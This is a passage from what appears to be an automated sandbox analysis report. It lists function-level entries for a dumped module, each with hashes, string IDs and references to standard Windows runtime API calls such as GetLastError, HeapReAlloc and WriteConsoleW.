                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorFileLastPointer__dosmaperr
                              • String ID: 8Q
                              • API String ID: 2336955059-4022487301
                              • Opcode ID: 0b2d1595de0d0b9fad585405bfcc790975a28840b752e102bde5c9aed082771b
                              • Instruction ID: 765f3e4e1f212d603186516412461f84c234d392754b953e850060b606c26515
                              • Opcode Fuzzy Hash: 0b2d1595de0d0b9fad585405bfcc790975a28840b752e102bde5c9aed082771b
                              • Instruction Fuzzy Hash: 9C01D83775151DAFCF058F6ADC059DE7B2DEB86326B240209FC619B680EB71D9028BA0
                              APIs
                              • AcquireSRWLockExclusive.KERNEL32(6C3E466C,?,652EF5AA,6C1B230E,6C3E430C), ref: 6C2E6B07
                              • ReleaseSRWLockExclusive.KERNEL32(6C3E466C), ref: 6C2E6B3A
                              • WakeAllConditionVariable.KERNEL32(6C3E4668), ref: 6C2E6B45
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                              • String ID: lF>l
                              • API String ID: 1466638765-560091355
                              • Opcode ID: 3708d66783377c56a785e006bda196c098d0e5448e595703955e8c486ed32bb6
                              • Instruction ID: bad783e480be38666929e08d11b02833676f0a96c0e139c4af57c8822033ccb7
                              • Opcode Fuzzy Hash: 3708d66783377c56a785e006bda196c098d0e5448e595703955e8c486ed32bb6
                              • Instruction Fuzzy Hash: 95F039B8601524DFCB55EF99E849D947BBCEB4E315B01806BF90687B01CB30A801CFA4
                              APIs
                              • GetLastError.KERNEL32(?,?,?,6C2EEF64,6C316DD8,0000000C), ref: 6C2F49B7
                              • _free.LIBCMT ref: 6C2F4A14
                              • _free.LIBCMT ref: 6C2F4A4A
                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C2EEF64,6C316DD8,0000000C), ref: 6C2F4A55
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast_free
                              • String ID:
                              • API String ID: 2283115069-0
                              • Opcode ID: 3adb2cae14dd8bfcf4d7aeccad4b2551fdc1172b98148e2564236fce8dcfd868
                              • Instruction ID: 5769886257334cb0fea8f955991a2aecdcace60dddbad56993c4e89594a0b7d3
                              • Opcode Fuzzy Hash: 3adb2cae14dd8bfcf4d7aeccad4b2551fdc1172b98148e2564236fce8dcfd868
                              • Instruction Fuzzy Hash: 8211E33338410D6BEA415AB98ED4D9AA16DDBC677DB250229FD34A2F90DFB18C0B4624
                              APIs
                              • WriteConsoleW.KERNEL32(00000000,?,6C3046EC,00000000,00000000,?,6C304B51,00000000,00000001,00000000,6C2FB0D0,?,6C2FC286,?,?,6C2FB0D0), ref: 6C305ED1
                              • GetLastError.KERNEL32(?,6C304B51,00000000,00000001,00000000,6C2FB0D0,?,6C2FC286,?,?,6C2FB0D0,?,6C2FB0D0,?,6C2FBD1C,6C305AB6), ref: 6C305EDD
                                • Part of subcall function 6C305F2E: CloseHandle.KERNEL32(FFFFFFFE,6C305EED,?,6C304B51,00000000,00000001,00000000,6C2FB0D0,?,6C2FC286,?,?,6C2FB0D0,?,6C2FB0D0), ref: 6C305F3E
                              • ___initconout.LIBCMT ref: 6C305EED
                                • Part of subcall function 6C305F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C305EAB,6C304B3E,6C2FB0D0,?,6C2FC286,?,?,6C2FB0D0,?), ref: 6C305F22
                              • WriteConsoleW.KERNEL32(00000000,?,6C3046EC,00000000,?,6C304B51,00000000,00000001,00000000,6C2FB0D0,?,6C2FC286,?,?,6C2FB0D0,?), ref: 6C305F02
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                              • String ID:
                              • API String ID: 2744216297-0
                              • Opcode ID: 53891ef32860d85367e4419e2be6fe886a78bbe28f7e642dd308dc96aa1b7afa
                              • Instruction ID: e356c70ef1608dc148e1ab60cda137268eec426add32d20e6a6150309e430dd8
                              • Opcode Fuzzy Hash: 53891ef32860d85367e4419e2be6fe886a78bbe28f7e642dd308dc96aa1b7afa
                              • Instruction Fuzzy Hash: 85F03037600215FFCF621FA1DC049993F3AFF497A5B084010FA1986620CB328820DF95
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog3_
                              • String ID: 8Q
                              • API String ID: 2427045233-4022487301
                              • Opcode ID: cc7e14e582b0cb27f4e2bb1255be87b1c72edad2b6bd7c8c9dff20be75140bd4
                              • Instruction ID: dc5c14747b919372234ce3d23a7de2adb3af01c0c61f5bee1776fa2eaeb2a41a
                              • Opcode Fuzzy Hash: cc7e14e582b0cb27f4e2bb1255be87b1c72edad2b6bd7c8c9dff20be75140bd4
                              • Instruction Fuzzy Hash: 3C71A475D8521E9BEB10CF95C880AEEFAB5BF05319F144215EC30A7A40DBB59847CBA2
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C338C5D
                                • Part of subcall function 6C33761A: __EH_prolog.LIBCMT ref: 6C33761F
                                • Part of subcall function 6C337A2E: __EH_prolog.LIBCMT ref: 6C337A33
                                • Part of subcall function 6C338EA5: __EH_prolog.LIBCMT ref: 6C338EAA
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: WZJ
                              • API String ID: 3519838083-1089469559
                              • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction ID: df42eefd7b186b932e85b0e83ee10d999dc3bc7e77dd3aed5b07753ccd78fb91
                              • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction Fuzzy Hash: 25815A31D00259DFCF15DFA4D990ADDB7B4AF19318F1040AAE456B7B90DB306A49CF62
                              APIs
                              • ___std_exception_destroy.LIBVCRUNTIME ref: 6C1B2A76
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ___std_exception_destroy
                              • String ID: Jbx$Jbx
                              • API String ID: 4194217158-1161259238
                              • Opcode ID: 14a9491efc416fefd137aa9905780731d22caf711794727c61928d7a18a19ef1
                              • Instruction ID: 8f38b27bc0cb8144fd69327ec0a88f51a7a9ddb3a16c748213ecd37ca9b4e48c
                              • Opcode Fuzzy Hash: 14a9491efc416fefd137aa9905780731d22caf711794727c61928d7a18a19ef1
                              • Instruction Fuzzy Hash: B85127B1D002049FCB10CF68C89469EBBB5EF89314F15856DE949EBB41D335E989CF91
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: CK$CK
                              • API String ID: 3519838083-2096518401
                              • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction ID: cf3ad13e8fb40c25ead6aacbc5c0f9d08527fc9f8d0e0897fb9fc1dea345e610
                              • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction Fuzzy Hash: 4E51BD75A00305DFDB00CFA6C8C4BEEB7B5FB88398F148529D901EBA49DB75A9058F61
                              APIs
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C3046D6), ref: 6C2FD01B
                              • __dosmaperr.LIBCMT ref: 6C2FD022
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr
                              • String ID: 8Q
                              • API String ID: 1659562826-4022487301
                              • Opcode ID: cf0d0e710a4be9f2e307119373dd7d304439451a13bc29b6236027070b4d3eaa
                              • Instruction ID: 185e5c1ac8dc54cb86e8cb5a06c60b9e4e05d3905c64c96344982959fa430f35
                              • Opcode Fuzzy Hash: cf0d0e710a4be9f2e307119373dd7d304439451a13bc29b6236027070b4d3eaa
                              • Instruction Fuzzy Hash: 4341867165419DAFE721AF28C880BA9FFA4EB4A718F14435AFCA08B641D7719807C790
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0|J$`)L
                              • API String ID: 3519838083-117937767
                              • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction ID: ec02781ed5f56384644495e871a7fb5af7b0b8a3505af5c46922bca9c6262dfc
                              • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction Fuzzy Hash: 4D41A331605785EFDB199F60C490BEABBE2FF45208F40442EE09A57B51CB716924CF52
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free
                              • String ID: dU>l$hU>l
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              APIs
                              • _free.LIBCMT ref: 6C2FDD49
                              • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C2FA63A,?,00000004,?,4B42FCB6,?,?,6C2EF78C,4B42FCB6,?), ref: 6C2FDD85
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: AllocHeap_free
                              • String ID: 8Q
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: p/K$J
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C35AFCC
                                • Part of subcall function 6C35A4D1: __EH_prolog.LIBCMT ref: 6C35A4D6
                                • Part of subcall function 6C35914B: __EH_prolog.LIBCMT ref: 6C359150
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J
                              APIs
                              • AcquireSRWLockExclusive.KERNEL32(6C3E466C,?,?,652EF5AA,6C1B22D8,6C3E430C), ref: 6C2E6AB9
                              • ReleaseSRWLockExclusive.KERNEL32(6C3E466C), ref: 6C2E6AF3
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ExclusiveLock$AcquireRelease
                              • String ID: lF>l
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: (?K$8?K$H?K$CK